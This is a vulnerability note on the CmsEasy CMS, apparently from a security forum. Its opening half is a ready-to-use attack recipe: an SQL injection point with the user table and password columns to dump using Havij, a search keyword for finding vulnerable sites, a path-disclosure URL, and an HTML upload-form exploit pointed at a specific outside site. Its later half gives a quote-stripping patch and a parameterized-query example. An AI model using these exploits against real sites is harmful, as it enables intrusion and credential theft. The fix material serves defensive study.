Injection Vulnerability
Injection point: /celive/js/include.php?cmseasylive=1111&departmentid=0
Type: MySQL blind, string-based
Keyword: online.gif
Table Name: cmseasy_user
Columns: userid, username, password
Run it directly in Havij. Error keyword: online.gif. Add table name: cmseasy_user, columns: userid, username, password. Keyword: Powered by CmsEasy
Path Disclosure 0day
Request the path-disclosing URL directly, for example: http://www.bkjia.com/index.php?case=archive
Upload Vulnerability
Exp:
<form enctype="multipart/form-data" method="post" action="http://www.8090sec.com/celive/live/doajaxfileupload.php">
<input type="file" name="fileToUpload">
<input type="submit" value="Upload">
</form>
Injection vulnerability fix:
Open the /celive/js/include.php file and go to line 52, or find the following code in this function:
if (isset($_GET['departmentid'])) {
    // The request value goes into the query string unchanged
    $departmentid = $_GET['departmentid'];
    $activity_sql = "SELECT `id` FROM `" . $config['prefix'] . "activity` WHERE `departmentid`='" . $departmentid . "' AND `operatorid`='" . $operatorid . "'";
Change the code to:
if (isset($_GET['departmentid'])) {
    // Strip single quotes from the request value before it is used in the query
    $departmentid = str_replace("'", "", $_GET['departmentid']);
    $activity_sql = "SELECT `id` FROM `" . $config['prefix'] . "activity` WHERE `departmentid`='" . $departmentid . "' AND `operatorid`='" . $operatorid . "'";
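A stricter form of the same fix, as an added example that is not CmsEasy's own code: instead of filtering one character, it validates departmentid as an integer and binds both values as query parameters. PDO, the in-memory SQLite database, the find_activity_ids helper and the sample rows are assumptions made so the script runs stand-alone; the table and column names follow the query above.

```php
<?php
// Added example, not CmsEasy's code. Assumptions: PDO is available, the
// activity table has integer departmentid/operatorid columns, and an
// in-memory SQLite database stands in for MySQL so the script runs offline.

function find_activity_ids(PDO $db, string $prefix, $rawDepartmentId, int $operatorId): array
{
    // Accept only a plain non-negative integer; anything else is rejected
    // before it gets near the query.
    $departmentId = filter_var($rawDepartmentId, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0]]);
    if ($departmentId === false) {
        throw new InvalidArgumentException('departmentid must be a non-negative integer');
    }

    // The prefix comes from configuration, not from the request, but it is
    // still checked because identifiers cannot be bound as parameters.
    if (!preg_match('/^[A-Za-z0-9_]*$/', $prefix)) {
        throw new InvalidArgumentException('invalid table prefix');
    }

    // Values travel as bound parameters, so they are never parsed as SQL.
    $stmt = $db->prepare(
        "SELECT id FROM {$prefix}activity WHERE departmentid = :dept AND operatorid = :op"
    );
    $stmt->execute([':dept' => $departmentId, ':op' => $operatorId]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE cmseasy_activity (id INTEGER PRIMARY KEY, departmentid INTEGER, operatorid INTEGER)');
$db->exec('INSERT INTO cmseasy_activity (departmentid, operatorid) VALUES (0, 7), (0, 8), (3, 7)');

// Constructed inputs: one well-formed value and two malformed ones.
foreach (['0', "0'", '0 OR 1=1'] as $input) {
    try {
        $ids = find_activity_ids($db, 'cmseasy_', $input, 7);
        echo json_encode($input), ' -> ids ', json_encode($ids), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo json_encode($input), ' -> rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

In include.php the raw value would be $_GET['departmentid'], and a rejected value should end the request rather than fall through to the query.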